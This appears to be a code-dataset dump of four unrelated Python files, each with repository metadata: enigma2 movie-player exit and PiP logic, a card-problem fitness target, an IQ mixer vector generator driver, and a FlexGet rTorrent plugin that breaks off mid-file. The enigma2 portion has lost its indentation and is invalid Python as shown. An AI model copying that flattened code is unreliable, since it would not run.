self.hidePipOnExitCallback(True)
elif config.usage.leave_movieplayer_onExit.value == "popup":
self.session.openWithCallback(self.leavePlayerOnExitCallback, MessageBox, _("Exit movie player?"), simple=True)
elif config.usage.leave_movieplayer_onExit.value == "without popup":
self.leavePlayerOnExitCallback(True)
elif config.usage.leave_movieplayer_onExit.value == "stop":
self.leavePlayer()
def leavePlayerOnExitCallback(self, answer):
if answer:
setResumePoint(self.session)
self.handleLeave("quit")
def hidePipOnExitCallback(self, answer):
if answer:
self.showPiP()
def deleteConfirmed(self, answer):
if answer:
self.leavePlayerConfirmed((True, "quitanddeleteconfirmed"))
def deleteAndMovielistConfirmed(self, answer):
if answer:
self.leavePlayerConfirmed((True, "deleteandmovielistconfirmed"))
def movielistAgain(self):
from Screens.MovieSelection import playlist
del playlist[:]
self.session.nav.playService(self.lastservice)
self.leavePlayerConfirmed((True, "movielist"))
def leavePlayerConfirmed(self, answer):
answer = answer and answer[1]
if answer is None:
return
if answer in ("quitanddelete", "quitanddeleteconfirmed", "deleteandmovielist", "deleteandmovielistconfirmed"):
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
serviceHandler = enigma.eServiceCenter.getInstance()
if answer in ("quitanddelete", "deleteandmovielist"):
msg = ''
if config.usage.movielist_trashcan.value:
import Tools.Trashcan
try:
trash = Tools.Trashcan.createTrashFolder(ref.getPath())
Screens.MovieSelection.moveServiceFiles(ref, trash)
# Moved to trash, okay
if answer == "quitanddelete":
self.close()
else:
self.movielistAgain()
return
except Exception, e:
print "[InfoBar] Failed to move to .Trash folder:", e
msg = _("Cannot move to trash can") + "\n" + str(e) + "\n"
info = serviceHandler.info(ref)
name = info and info.getName(ref) or _("this recording")
msg += _("Do you really want to delete %s?") % name
if answer == "quitanddelete":
self.session.openWithCallback(self.deleteConfirmed, MessageBox, msg)
elif answer == "deleteandmovielist":
self.session.openWithCallback(self.deleteAndMovielistConfirmed, MessageBox, msg)
return
elif answer in ("quitanddeleteconfirmed", "deleteandmovielistconfirmed"):
offline = serviceHandler.offlineOperations(ref)
if offline.deleteFromDisk(0):
self.session.openWithCallback(self.close, MessageBox, _("You cannot delete this!"), MessageBox.TYPE_ERROR)
if answer == "deleteandmovielistconfirmed":
self.movielistAgain()
return
if answer in ("quit", "quitanddeleteconfirmed"):
self.close()
elif answer in ("movielist", "deleteandmovielistconfirmed"):
if config.movielist.stop_service.value:
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
else:
ref = self.lastservice
self.returning = True
self.session.openWithCallback(self.movieSelected, Screens.MovieSelection.MovieSelection, ref)
self.session.nav.stopService()
if not config.movielist.stop_service.value:
self.session.nav.playService(self.lastservice)
elif answer == "restart":
self.doSeek(0)
self.setSeekState(self.SEEK_STATE_PLAY)
elif answer in ("playlist","playlistquit","loop"):
( next_service, item , length ) = self.getPlaylistServiceInfo(self.cur_service)
if next_service is not None:
if config.usage.next_movie_msg.value:
self.displayPlayedName(next_service, item, length)
self.session.nav.playService(next_service)
self.cur_service = next_service
else:
if answer == "playlist":
self.leavePlayerConfirmed([True,"movielist"])
elif answer == "loop" and length > 0:
self.leavePlayerConfirmed([True,"loop"])
else:
self.leavePlayerConfirmed([True,"quit"])
		elif answer == "repeatcurrent":
if config.usage.next_movie_msg.value:
(item, length) = self.getPlaylistServiceInfo(self.cur_service)
self.displayPlayedName(self.cur_service, item, length)
self.session.nav.stopService()
self.session.nav.playService(self.cur_service)
def doEofInternal(self, playing):
if not self.execing:
return
if not playing :
return
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if ref:
delResumePoint(ref)
self.handleLeave(config.usage.on_movie_eof.value)
def up(self):
slist = self.servicelist
if slist and slist.dopipzap:
if "keep" not in config.usage.servicelist_cursor_behavior.value:
slist.moveUp()
self.session.execDialog(slist)
else:
self.showMovies()
def down(self):
slist = self.servicelist
if slist and slist.dopipzap:
if "keep" not in config.usage.servicelist_cursor_behavior.value:
slist.moveDown()
self.session.execDialog(slist)
else:
self.showMovies()
def right(self):
# XXX: gross hack, we do not really seek if changing channel in pip :-)
slist = self.servicelist
if slist and slist.dopipzap:
# XXX: We replicate InfoBarChannelSelection.zapDown here - we shouldn't do that
if slist.inBouquet():
prev = slist.getCurrentSelection()
if prev:
prev = prev.toString()
while True:
if config.usage.quickzap_bouquet_change.value and slist.atEnd():
slist.nextBouquet()
else:
slist.moveDown()
cur = slist.getCurrentSelection()
if not cur or (not (cur.flags & 64)) or cur.toString() == prev:
break
else:
slist.moveDown()
slist.zap(enable_pipzap = True)
else:
InfoBarSeek.seekFwd(self)
def left(self):
slist = self.servicelist
if slist and slist.dopipzap:
# XXX: We replicate InfoBarChannelSelection.zapUp here - we shouldn't do that
if slist.inBouquet():
prev = slist.getCurrentSelection()
if prev:
prev = prev.toString()
while True:
if config.usage.quickzap_bouquet_change.value:
if slist.atBegin():
slist.prevBouquet()
slist.moveUp()
cur = slist.getCurrentSelection()
if not cur or (not (cur.flags & 64)) or cur.toString() == prev:
break
else:
slist.moveUp()
slist.zap(enable_pipzap = True)
else:
InfoBarSeek.seekBack(self)
def showPiP(self):
slist = self.servicelist
if self.session.pipshown:
if slist and slist.dopipzap:
slist.togglePipzap()
if self.session.pipshown:
del self.session.pip
self.session.pipshown = False
else:
service = self.session.nav.getCurrentService()
info = service and service.info()
xres = str(info.getInfo(enigma.iServiceInformation.sVideoWidth))
if int(xres) <= 720 or not getMachineBuild() == 'blackbox7405':
from Screens.PictureInPicture import PictureInPicture
self.session.pip = self.session.instantiateDialog(PictureInPicture)
self.session.pip.show()
if self.session.pip.playService(slist.getCurrentSelection()):
self.session.pipshown = True
self.session.pip.servicePath = slist.getCurrentServicePath()
else:
self.session.pipshown = False
del self.session.pip
else:
self.session.open(MessageBox, _("Your %s %s does not support PiP HD") % (getMachineBrand(), getMachineName()), type = MessageBox.TYPE_INFO,timeout = 5 )
def movePiP(self):
if self.session.pipshown:
InfoBarPiP.movePiP(self)
def swapPiP(self):
pass
def showMovies(self):
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if ref and ':0:/' not in ref.toString():
self.playingservice = ref # movie list may change the currently playing
else:
self.playingservice = enigma.eServiceReference(config.movielist.curentlyplayingservice.value)
self.session.openWithCallback(self.movieSelected, Screens.MovieSelection.MovieSelection, ref)
def movieSelected(self, service):
if service is not None:
self.cur_service = service
self.is_closing = False
self.session.nav.playService(service)
self.returning = False
elif self.returning:
self.close()
else:
self.is_closing = False
try:
ref = self.playingservice
del self.playingservice
# no selection? Continue where we left off
if ref and not self.session.nav.getCurrentlyPlayingServiceOrGroup():
self.session.nav.playService(ref)
except:
pass
def getPlaylistServiceInfo(self, service):
from MovieSelection import playlist
for i, item in enumerate(playlist):
if item == service:
if config.usage.on_movie_eof.value == "repeatcurrent":
return i+1, len(playlist)
i += 1
if i < len(playlist):
return playlist[i], i+1, len(playlist)
elif config.usage.on_movie_eof.value == "loop":
return playlist[0], 1, len(playlist)
return None, 0, 0
def displayPlayedName(self, ref, index, n):
from Tools import Notifications
Notifications.AddPopup(text = _("%s/%s: %s") % (index, n, self.ref2HumanName(ref)), type = MessageBox.TYPE_INFO, timeout = 5)
def ref2HumanName(self, ref):
return enigma.eServiceCenter.getInstance().info(ref).getName(ref)
|
formiano/enigma2
|
lib/python/Screens/InfoBar.py
|
Python
|
gpl-2.0
| 33,112
| 0.029899
|
class target(object):
def __init__(self):
self.encodingString = "1,10 1,10 1,10 1,10 1,10 1.0 p1-1,10 1,10 1,10 1,10 1,10 1.0 p2"
self.canAdd = False
self.canRemove = False
self.initializationType = "sequential"
self.encodingTable = None
self.group1 = []
self.group2 = []
def build_from_genome(self,genome):
        assert genome is not None, "Null genome passed to target!"
self.group1 = genome[0][1:]
self.group2 = genome[1][1:]
#self.params = [delta,minArea,maxArea,maxVariation,minDiversity,maxEvolution,areaThreshold,minMargin,edgeBlurSize]
def evaluate(self):
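        # Inferred intent (from the constants below): the classic card
        # problem, i.e. split the cards 1..10 into two groups so that one
        # group sums to 36 and the other multiplies to 360; duplicate cards
        # across groups are penalized. A perfect split scores 0, anything
        # else scores negative.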
genes = []
m = 1
s = 0
for arg in self.group1:
s+=arg
genes.append(arg)
for arg in self.group2:
m*=arg
genes.append(arg)
duplicateCount = len(genes) - len(set(genes))
m-=360
s-=36
fitness = -(abs(m) + abs(s)) - duplicateCount
#print("\nFITNESS:",fitness,"\n")
return fitness
def validate_genome(self,genome):
return True
|
AechPro/Machine-Learning
|
Partners Healthcare/2016 Breast Cancer/dev/ReconNet/optimization/targets/Card_Problem_Target.py
|
Python
|
apache-2.0
| 1,157
| 0.012965
|
from math import ceil
import numpy as np
from ipywidgets import widgets
from tqdm.notebook import tqdm
from matplotlib import pyplot as plt
import lib.iq_mixer_calibration
from drivers import IQAWG
from lib.data_management import load_IQMX_calibration_database, \
save_IQMX_calibration
from lib.iq_mixer_calibration import IQCalibrator
class IQVectorGenerator:
def __init__(self, name, lo, iq_awg: IQAWG, sa, calibration_db_name="IQVG",
default_calibration_power=-30, marker_period_divisor=None,
slave_iqvgs=None, calibration_step=10e6):
"""
Parameters
----------
lo
iq_awg
sa
calibration_db_name
default_calibration_power
marker_period_divisor: int, ns
            by default, the marker period should be divisible by the if_period;
            however, in some cases another divisor may be required, e.g. when
            m3202 is used with the PXICLK10 trigger sync mode this divisor
            should be set to 100
"""
self._name = name
self._lo = lo
self._iqawg = iq_awg
self._sa = sa
self._cal_db_name = calibration_db_name
self._default_calibration_power = default_calibration_power
self._calibration_widget = widgets.HTML()
self._recalibrate_mixer = False
self._frequency = 5e9
self.set_if_frequency(100e6)
if marker_period_divisor is not None:
self._marker_period_divisor = marker_period_divisor
else:
self._marker_period_divisor = self._if_period
# for marker period synchronization when iqvgs are on the same AWG
self._slave_iqvgs = slave_iqvgs if slave_iqvgs is not None else []
self._power = default_calibration_power
self._dac_overridden = False
self._current_cal = None
self._requested_cal: lib.iq_mixer_calibration.IQCalibrationData = None
self._cal_db = None
self._marker_period = None
self._requested_marker_period = None
self.set_marker_period(1000)
self._calibration_initial_guess = {"dc_offsets": np.random.uniform(.03, 0.1, size=2),
"if_amplitudes": (.1, .1),
"if_phase": -np.pi * 0.54}
self._calibration_step = calibration_step
self._calibration_test_data = []
self._load_cal_db()
def get_calibration_widget(self):
return self._calibration_widget
def set_parameters(self, parameters_dict):
if "power" in parameters_dict:
self.set_power(parameters_dict["power"])
if "freq" in parameters_dict:
self.set_frequency(parameters_dict["freq"])
if "dac_overridden" in parameters_dict:
self._dac_overridden = parameters_dict["dac_overridden"]
else:
self._dac_overridden = False
def get_iqawg(self):
self._iqawg.set_parameters(
{'calibration': self._current_cal}) # ensure
return self._iqawg
def set_if_frequency(self, if_frequency):
self._if_frequency = if_frequency
self._if_period = 1 / if_frequency * 1e9 # ns
def get_if_frequency(self):
return self._if_frequency
def set_output_state(self, state):
self._lo.set_output_state(state)
def set_frequency(self, freq):
self._frequency = freq
self._lo.set_frequency(self._frequency + self._if_frequency)
self._requested_cal = self.get_calibration(self._frequency,
self._power)
self._output_SSB()
def set_power(self, power):
        if power > self._default_calibration_power + 10:
            raise ValueError("Power can be %d dBm max, requested %d dBm" % (
                self._default_calibration_power + 10, power))
self._power = power
self._requested_cal = self.get_calibration(self._frequency,
self._power)
self._lo.set_power(self._requested_cal.get_lo_power())
self._output_SSB()
def get_power(self):
return self._power
def set_marker_period(self, marker_period):
        """
        For some applications there is a need to control the length of the
        interval between triggers output by the AWG of the IQVectorGenerator.
        Parameters
        ----------
        marker_period: ns, float
            the real trigger period will be recalculated to be not shorter
            than <marker_period> ns, but still divisible by the IF period
        """
self._requested_marker_period = marker_period
correct_marker_period = ceil(
marker_period / self._marker_period_divisor) * \
self._marker_period_divisor
if correct_marker_period != self._marker_period:
self._marker_period = correct_marker_period
if self._requested_cal is not None:
self._current_cal = None
self._output_SSB()
for slave_iqvg in self._slave_iqvgs:
slave_iqvg.set_marker_period(self._marker_period)
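    # Illustration (editorial, with the default 100 MHz IF): the divisor is the
    # 10 ns IF period, so a requested marker period of 1004 ns becomes
    # ceil(1004 / 10) * 10 == 1010 ns, the nearest not-shorter multiple.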
def _output_SSB(self):
if self._requested_cal != self._current_cal:
# print(f"IQVG {self._name}: outputting pulse sequence to update calibration for frequency: {self._frequency/1e9:.4f} GHz"
# f", power: {self._power} dBm.")
self._iqawg.set_parameters({"calibration": self._requested_cal})
pb = self._iqawg.get_pulse_builder()
if_freq = self._requested_cal.get_radiation_parameters()[
"if_frequency"]
resolution = self._requested_cal.get_radiation_parameters()[
"waveform_resolution"]
            if_period = 1 / if_freq * 1e9  # ns, same unit as resolution
            if if_period % resolution != 0:
print(
f"IQVectorGenerator {self._name} warning: IF period is not divisible by "
"calibration waveform resolution. Phase coherence will be bad.")
seq = pb.add_sine_pulse(self._marker_period).build()
self._iqawg.output_pulse_sequence(seq)
self._current_cal = self._requested_cal
# time.sleep(1)
def _load_cal_db(self):
self._cal_db = load_IQMX_calibration_database(self._cal_db_name, 0)
def _around_frequency(self, frequency):
# return ceil(frequency/self._calibration_step)*self._calibration_step
return round(frequency / self._calibration_step) * self._calibration_step
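    # Illustration (editorial): with the default 10 MHz calibration step,
    # 5.123 GHz snaps to round(512.3) * 10 MHz == 5.12 GHz.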
def get_calibration(self, frequency, power):
frequency = self._around_frequency(frequency)
# frequency = round(frequency/self._calibration_step)*self._calibration_step
if self._cal_db is None:
self._load_cal_db()
cal = \
self._cal_db.get(frozenset(dict(lo_power=14,
ssb_power=self._default_calibration_power,
lo_frequency=self._if_frequency + frequency,
if_frequency=self._if_frequency,
waveform_resolution=1,
sideband_to_maintain='left').items()))
if (cal is None) or self._recalibrate_mixer:
calibrator = IQCalibrator(self._iqawg, self._sa, self._lo,
self._cal_db_name, 0,
sidebands_to_suppress=6,
output_widget=self._calibration_widget)
ig = self._calibration_initial_guess
cal = calibrator.calibrate(
lo_frequency=frequency + self._if_frequency,
if_frequency=self._if_frequency,
lo_power=14,
ssb_power=self._default_calibration_power,
waveform_resolution=1,
iterations=3,
minimize_iterlimit=100,
sa_res_bandwidth=300,
initial_guess=ig)
save_IQMX_calibration(cal)
self._load_cal_db() # make sure to include new calibration into cache
cal._ssb_power = power
cal._if_amplitudes = cal._if_amplitudes / np.sqrt(
10 ** ((self._default_calibration_power - power) / 10))
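            # Editorial note: a D dB power reduction scales voltage amplitude
            # by 10**(D/20), and sqrt(10**(D/10)) == 10**(D/20), so requesting
            # 20 dB below the calibration power divides the IF amplitudes by 10.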
# self._calibration_initial_guess["if_amplitudes"] = cal._if_amplitudes
self._calibration_initial_guess["if_phase"] = cal._if_phase
return cal
else:
cal = cal.copy()
cal._if_amplitudes = cal._if_amplitudes / np.sqrt(
10 ** ((self._default_calibration_power - power) / 10))
return cal
def calibrate_mixer(self, fstart, fstop, recalibrate=False):
"""
Performs calibration of the mixer in a frequency range
Parameters
----------
fstart: float
start of the frequency range
fstop : float
stop of the frequency range
recalibrate : bool
Whether or not to calibrate from scratch and override previous
calibration in this interval.
"""
fstart = self._around_frequency(fstart)
fstop = self._around_frequency(fstop)
self._recalibrate_mixer = recalibrate
pb = tqdm(np.arange(fstart, fstop + self._calibration_step, self._calibration_step),
smoothing=0)
for frequency in pb:
pb.set_description("%.3f GHz" % (frequency / 1e9))
for counter in range(3):
try:
self.set_frequency(frequency)
break
except ValueError:
print("Poor calibration at %.3f GHz, retry count "
"%d" % (frequency / 1e9, counter))
self._calibration_initial_guess["dc_offest"] = \
np.random.uniform(.03, 0.1, size=2)
self._recalibrate_mixer = False
def test_calibration(self, fstart, fstop, step=1e6,
sidebands_to_plot=[-1, 0, 1],
remeasure=False):
"""
Tests the saved calibrations by monitoring all the sidebands throughout
the specified frequency range
Parameters
----------
fstart: float, Hz
start of the frequency range
fstop: float, Hz
stop of the frequency range
step: float, Hz
step of the scan
remeasure : bool
remeasure or just replot the data from the previous run
"""
sideband_shifts = np.linspace(-3, 3, 7) * self._if_frequency
freqs = np.arange(fstart, fstop + step, step)
if remeasure or len(self._calibration_test_data) == 0:
self._calibration_test_data = []
for frequency in tqdm(freqs, smoothing=0):
self.set_frequency(frequency)
sa_freqs = sideband_shifts + self._frequency
self._sa.setup_list_sweep(list(sa_freqs), [1000] * 3)
self._sa.prepare_for_stb()
self._sa.sweep_single()
self._sa.wait_for_stb()
self._calibration_test_data.append(self._sa.get_tracedata())
self._calibration_test_data = np.array(
self._calibration_test_data).T
sidebands_to_plot_idcs = np.array(sidebands_to_plot, dtype=int) + 3
sideband_shifts = sideband_shifts[sidebands_to_plot_idcs]
data = self._calibration_test_data[sidebands_to_plot_idcs]
for row, sideband_shift in zip(data, sideband_shifts):
plt.plot(freqs, row, label=f"{(sideband_shift / 1e6):.2f} MHz")
plt.legend()
self._sa.setup_swept_sa(-self._if_frequency + self._frequency,
10 * self._if_frequency,
nop=1001, rbw=1e4)
self._sa.set_continuous()
|
vdrhtc/Measurement-automation
|
drivers/IQVectorGenerator.py
|
Python
|
gpl-3.0
| 12,060
| 0.001244
|
from __future__ import unicode_literals, division, absolute_import
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
from future.moves.xmlrpc import client as xmlrpc_client
from future.moves.urllib.parse import urlparse, urljoin
from future.utils import native_str
import logging
import os
import socket
import re
from time import sleep
from flexget.utils.template import RenderError
from flexget.utils.pathscrub import pathscrub
from flexget import plugin
from flexget.event import event
from flexget.entry import Entry
from flexget.config_schema import one_or_more
from flexget.utils.bittorrent import Torrent, is_torrent_file
from requests.auth import HTTPDigestAuth, HTTPBasicAuth
log = logging.getLogger('rtorrent')
class _Method(object):
# some magic to bind an XML-RPC method to an RPC server.
# supports "nested" methods (e.g. examples.getStateName)
def __init__(self, send, name):
self.__send = send
self.__name = name
def __getattr__(self, name):
return _Method(self.__send, "%s.%s" % (self.__name, name))
def __call__(self, *args):
return self.__send(self.__name, args)
class HTTPDigestTransport(xmlrpc_client.Transport):
"""
Transport that uses requests to support Digest authentication.
"""
def __init__(self, scheme, digest_auth, username, password, session, *args, **kwargs):
self.__scheme = scheme
self.__session = session
self.__digest_auth = digest_auth
self.__username = username
self.__password = password
self.verbose = 0
xmlrpc_client.Transport.__init__(self, *args, **kwargs) # old style class
def request(self, host, handler, request_body, verbose=False):
return self.single_request(host, handler, request_body, verbose)
def single_request(self, host, handler, request_body, verbose=0):
url = urljoin('{0}://{1}'.format(self.__scheme, host), handler)
auth = self.get_auth()
response = self.send_request(url, auth, request_body)
# if status code is 401, it means we used the wrong auth method
if response.status_code == 401:
log.warning('%s auth failed. Retrying with %s. Please change your config.',
'Digest' if self.__digest_auth else 'Basic',
'Basic' if self.__digest_auth else 'Digest')
self.__digest_auth = not self.__digest_auth
auth = self.get_auth()
response = self.send_request(url, auth, request_body)
response.raise_for_status()
return self.parse_response(response)
def get_auth(self):
if self.__digest_auth:
return HTTPDigestAuth(self.__username, self.__password)
return HTTPBasicAuth(self.__username, self.__password)
def send_request(self, url, auth, data):
return self.__session.post(url, auth=auth, data=data, raise_status=False)
def parse_response(self, response):
p, u = self.getparser()
if self.verbose:
log.info('body: %s', repr(response))
p.feed(response.content)
p.close()
return u.close()
class SCGITransport(xmlrpc_client.Transport):
""" Used to override the default xmlrpclib transport to support SCGI """
def __init__(self, *args, **kwargs):
self.verbose = 0
xmlrpc_client.Transport.__init__(self, *args, **kwargs)
def request(self, host, handler, request_body, verbose=False):
return self.single_request(host, handler, request_body, verbose)
def single_request(self, host, handler, request_body, verbose=0):
# Add SCGI headers to the request.
headers = [('CONTENT_LENGTH', native_str(len(request_body))), ('SCGI', '1')]
header = '\x00'.join(['%s\x00%s' % (key, value) for key, value in headers]) + '\x00'
header = '%d:%s' % (len(header), header)
request_body = '%s,%s' % (header, request_body)
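        # Illustration (editorial): for a 10-byte body the framed request is
        # '25:CONTENT_LENGTH\x0010\x00SCGI\x001\x00,<body>' -- NUL-separated
        # headers wrapped in a netstring, followed by the raw XML-RPC payload.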
sock = None
try:
if host:
parsed_host = urlparse(host)
host = parsed_host.hostname
port = parsed_host.port
addr_info = socket.getaddrinfo(host, port, socket.AF_INET, socket.SOCK_STREAM)
sock = socket.socket(*addr_info[0][:3])
sock.connect(addr_info[0][4])
else:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(handler)
self.verbose = verbose
sock.sendall(request_body.encode())
return self.parse_response(sock.makefile())
finally:
if sock:
sock.close()
def parse_response(self, response):
p, u = self.getparser()
response_body = ''
while True:
data = response.read(1024)
if not data:
break
response_body += data
if self.verbose:
log.info('body: %s', repr(response_body))
# Remove SCGI headers from the response.
_, response_body = re.split(r'\n\s*?\n', response_body, maxsplit=1)
p.feed(response_body)
p.close()
return u.close()
class SCGIServerProxy(object):
""" Enable connection to SCGI proxy """
def __init__(self, uri, transport=None, encoding=None,
verbose=False, allow_none=False, use_datetime=False):
parsed_url = urlparse(uri)
self.__host = uri if parsed_url.scheme else None
self.__handler = parsed_url.path
if not self.__handler:
self.__handler = '/'
if not transport:
transport = SCGITransport(use_datetime=use_datetime)
self.__transport = transport
self.__encoding = encoding or 'utf-8'
self.__verbose = verbose
self.__allow_none = allow_none
def __close(self):
self.__transport.close()
def __request(self, method_name, params):
# call a method on the remote server
request = xmlrpc_client.dumps(params, method_name, encoding=self.__encoding,
allow_none=self.__allow_none).encode(self.__encoding)
response = self.__transport.request(
self.__host,
self.__handler,
request.decode('utf-8'),
verbose=self.__verbose
)
if len(response) == 1:
response = response[0]
return response
def __repr__(self):
return (
"<ServerProxy for %s%s>" %
(self.__host, self.__handler)
)
__str__ = __repr__
def __getattr__(self, name):
# magic method dispatcher
return _Method(self.__request, name)
# note: to call a remote object with an non-standard name, use
# result getattr(server, "strange-python-name")(args)
def __call__(self, attr):
"""A workaround to get special attributes on the ServerProxy
without interfering with the magic __getattr__
"""
if attr == "close":
return self.__close
elif attr == "transport":
return self.__transport
raise AttributeError("Attribute %r not found" % (attr,))
class RTorrent(object):
""" rTorrent API client """
default_fields = (
'hash',
'name',
'up_total', 'down_total', 'down_rate',
'is_open', 'is_active',
'custom1', 'custom2', 'custom3', 'custom4', 'custom5',
'state', 'complete',
'bytes_done', 'down.rate', 'left_bytes',
'ratio',
'base_path', 'load_date'
)
required_fields = (
'hash',
'name',
'base_path'
)
def __init__(self, uri, username=None, password=None, digest_auth=None, session=None):
"""
New connection to rTorrent
:param uri: RTorrent URL. Supports both http(s) and scgi
:param username: Username for basic auth over http(s)
:param password: Password for basic auth over http(s)
"""
self.uri = uri
self.username = username
self.password = password
self.digest_auth = digest_auth
self._version = None
parsed_uri = urlparse(uri)
if self.username and self.password and parsed_uri.scheme not in ['http', 'https']:
raise IOError('Username and password only supported on http(s)')
# Determine the proxy server
if parsed_uri.scheme in ['http', 'https']:
sp = xmlrpc_client.ServerProxy
elif parsed_uri.scheme == 'scgi':
sp = SCGIServerProxy
elif parsed_uri.scheme == '' and parsed_uri.path:
self.uri = parsed_uri.path
sp = SCGIServerProxy
else:
raise IOError('Unsupported scheme %s for uri %s' % (parsed_uri.scheme, self.uri))
# Use a special transport if http(s)
if parsed_uri.scheme in ['http', 'https']:
self._server = sp(self.uri, transport=HTTPDigestTransport(parsed_uri.scheme, self.digest_auth,
self.username, self.password, session))
else:
self._server = sp(self.uri)
def _clean_fields(self, fields, reverse=False):
if not fields:
fields = list(self.default_fields)
if reverse:
for field in ['up.total', 'down.total', 'down.rate']:
if field in fields:
fields[fields.index(field)] = native_str(field.replace('.', '_'))
return fields
for required_field in self.required_fields:
if required_field not in fields:
fields.insert(0, required_field)
for field in ['up_total', 'down_total', 'down_rate']:
if field in fields:
fields[fields.index(field)] = native_str(field.replace('_', '.'))
return fields
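    # Illustration (editorial): the forward mapping turns e.g. 'down_rate' into
    # rTorrent's XML-RPC name 'down.rate'; reverse=True maps the dotted names
    # back to underscore form so they can be used as plain dict keys.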
@property
def version(self):
return [int(v) for v in self._server.system.client_version().split('.')]
def load(self, raw_torrent, fields=None, start=False, mkdir=True):
if fields is None:
fields = {}
# First param is empty 'target'
params = ['', xmlrpc_client.Binary(raw_torrent)]
# Additional fields to set
for key, val in fields.items():
# Values must be escaped if within params
params.append('d.%s.set=%s' % (key, re.escape(native_str(val))))
if mkdir and 'directory' in fields:
result = self._server.execute.throw('', 'mkdir', '-p', fields['directory'])
if result != 0:
raise xmlrpc_client.Error('Failed creating directory %s' % fields['directory'])
# by default rtorrent won't allow calls over 512kb in size.
xmlrpc_size = len(xmlrpc_client.dumps(tuple(params), 'raw_start')) + 71680 # Add 70kb for buffer
if xmlrpc_size > 524288:
prev_size = self._server.network.xmlrpc.size_limit()
self._server.network.xmlrpc.size_limit.set('', xmlrpc_size)
# Call load method and return the response
if start:
result = self._server.load.raw_start(*params)
else:
result = self._server.load.raw(*params)
if xmlrpc_size > 524288:
self._server.network.xmlrpc.size_limit.set('', prev_size)
return result
def torrent(self, info_hash, fields=None):
""" Get the details of a torrent """
info_hash = native_str(info_hash)
if not fields:
fields = list(self.default_fields)
fields = self._clean_fields(fields)
multi_call = xmlrpc_client.MultiCall(self._server)
for field in fields:
method_name = 'd.%s' % field
getattr(multi_call, method_name)(info_hash)
resp = multi_call()
# TODO: Maybe we should return a named tuple or a Torrent class?
return dict(list(zip(self._clean_fields(fields, reverse=True), [val for val in resp])))
def torrents(self, view='main', fields=None):
if not fields:
fields = list(self.default_fields)
fields = self._clean_fields(fields)
params = ['d.%s=' % field for field in fields]
params.insert(0, view)
resp = self._server.d.multicall(params)
# Response is formatted as a list of lists, with just the values
return [dict(list(zip(self._clean_fields(fields, reverse=True), val))) for val in resp]
def update(self, info_hash, fields):
multi_call = xmlrpc_client.MultiCall(self._server)
for key, val in fields.items():
method_name = 'd.%s.set' % key
getattr(multi_call, method_name)(native_str(info_hash), native_str(val))
return multi_call()[0]
def delete(self, info_hash):
return self._server.d.erase(native_str(info_hash))
def stop(self, info_hash):
self._server.d.stop(info_hash)
return self._server.d.close(native_str(info_hash))
def start(self, info_hash):
return self._server.d.start(native_str(info_hash))
def move(self, info_hash, dst_path):
info_hash = native_str(info_hash)
self.stop(info_hash)
torrent = self.torrent(info_hash, fields=['base_path'])
try:
log.verbose('Creating destination directory `%s`' % dst_path)
self._server.execute.throw('', 'mkdir', '-p', dst_path)
except xmlrpc_client.Error:
raise xmlrpc_client.Error("unable to create folder %s" % dst_path)
self._server.execute.throw('', 'mv', '-u', torrent['base_path'], dst_path)
self._server.d.set_directory(info_hash, dst_path)
self.start(info_hash)
class RTorrentPluginBase(object):
priority_map = {
'high': 3,
'medium': 2,
'low': 1,
'off': 0,
}
def _build_options(self, config, entry, entry_first=True):
options = {}
for opt_key in ('path', 'message', 'priority',
'custom1', 'custom2', 'custom3', 'custom4', 'custom5'):
# Values do not merge config with task
# Task takes priority then config is used
entry_value = entry.get(opt_key)
config_value = config.get(opt_key)
if entry_first:
if entry_value:
options[opt_key] = entry.render(entry_value)
elif config_value:
options[opt_key] = entry.render(config_value)
else:
if config_value:
options[opt_key] = entry.render(config_value)
elif entry_value:
options[opt_key] = entry.render(entry_value)
# Convert priority from string to int
priority = options.get('priority')
if priority and priority in self.priority_map:
options['priority'] = self.priority_map[priority]
# Map Flexget path to directory in rTorrent
if options.get('path'):
options['directory'] = options['path']
del options['path']
if 'directory' in options:
options['directory'] = pathscrub(options['directory'])
return options
def on_task_start(self, task, config):
try:
client = RTorrent(os.path.expanduser(config['uri']),
username=config.get('username'),
password=config.get('password'),
digest_auth=config['digest_auth'],
session=task.requests)
if client.version < [0, 9, 2]:
log.error('rtorrent version >=0.9.2 required, found {0}'.format('.'.join(map(str, client.version))))
task.abort('rtorrent version >=0.9.2 required, found {0}'.format('.'.join(map(str, client.version))))
except (IOError, xmlrpc_client.Error) as e:
raise plugin.PluginError("Couldn't connect to rTorrent: %s" % str(e))
class RTorrentOutputPlugin(RTorrentPluginBase):
schema = {
'type': 'object',
'properties': {
# connection info
'uri': {'type': 'string'},
'username': {'type': 'string'},
'password': {'type': 'string'},
'digest_auth': {'type': 'boolean', 'default': False},
'start': {'type': 'boolean', 'default': True},
'mkdir': {'type': 'boolean', 'default': True},
        'action': {'type': 'string', 'enum': ['update', 'delete', 'add'], 'default': 'add'},
# properties to set on rtorrent download object
'message': {'type': 'string'},
'priority': {'type': 'string'},
'path': {'type': 'string'},
'custom1': {'type': 'string'},
'custom2': {'type': 'string'},
'custom3': {'type': 'string'},
'custom4': {'type': 'string'},
'custom5': {'type': 'string'},
},
'required': ['uri'],
'additionalProperties': False,
}
def _verify_load(self, client, info_hash):
ex = IOError()
for _ in range(0, 5):
try:
return client.torrent(info_hash, fields=['hash'])
except (IOError, xmlrpc_client.Error) as e:
ex = e
sleep(0.5)
raise ex
@plugin.priority(120)
def on_task_download(self, task, config):
# If the download plugin is not enabled, we need to call it to get
# our temp .torrent files
if config['action'] == 'add' and 'download' not in task.config:
download = plugin.get_plugin_by_name('download')
download.instance.get_temp_files(task, handle_magnets=True, fail_html=True)
@plugin.priority(135)
def on_task_output(self, task, config):
client = RTorrent(os.path.expanduser(config['uri']),
username=config.get('username'),
password=config.get('password'),
digest_auth=config['digest_auth'],
session=task.requests)
for entry in task.accepted:
if config['action'] == 'add':
if task.options.test:
log.info('Would add %s to rTorrent', entry['url'])
continue
try:
options = self._build_options(config, entry)
except RenderError as e:
entry.fail("failed to render properties %s" % str(e))
continue
self.add_entry(client, entry, options, start=config['start'], mkdir=config['mkdir'])
info_hash = entry.get('torrent_info_hash')
if not info_hash:
entry.fail('Failed to %s as no info_hash found' % config['action'])
continue
if config['action'] == 'delete':
if task.options.test:
log.info('Would delete %s (%s) from rTorrent', entry['title'], entry['torrent_info_hash'])
continue
self.delete_entry(client, entry)
